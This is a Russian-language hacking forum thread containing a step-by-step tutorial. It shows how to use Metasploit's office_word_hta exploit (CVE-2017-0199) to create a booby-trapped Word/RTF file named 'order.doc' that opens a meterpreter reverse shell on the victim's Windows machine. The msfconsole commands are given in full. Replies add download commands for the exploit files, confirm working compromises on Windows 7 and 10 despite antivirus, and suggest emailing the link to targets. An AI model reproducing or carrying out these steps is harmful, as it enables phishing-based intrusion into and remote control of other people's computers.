![]() |
Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.
https://forum.antichat.xyz/attachmen...2af45444ed.png Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ. OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт. OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии. Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ. Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы. Начнем: > use exploit/windows/fileformat/office_word_hta > set srvhost 192.168.0.106 > set payload windows/meterpreter/reverse_tcp > set filename order.doc > set lhost 192.168.0.106 > exploit https://forum.antichat.xyz/attachmen...7999c2e622.png Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост: https://forum.antichat.xyz/attachmen...da30e63055.png Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter: https://forum.antichat.xyz/attachmen...ff849693da.png > sysinfo https://forum.antichat.xyz/attachmen...fd5e8de6cc.png На этом все, спасибо за внимание. |
Цитата:
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г. Но всё равно подозрительная тишина в отношении успеха. Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ. Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам. И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО. |
Цитата:
|
Цитата:
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение. |
К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
качнуть код - под хайд https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt Но это не все, что бы не получить ошибку: Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf качаем: wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf стартуем, пробуем =) ТС - респект за оперативный топик =) |
Цитата:
|
Все работает
win7 SP1 Эннтерпрайз |
отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание) |
Цитата:
|
Цитата:
|
| Время: 02:32 |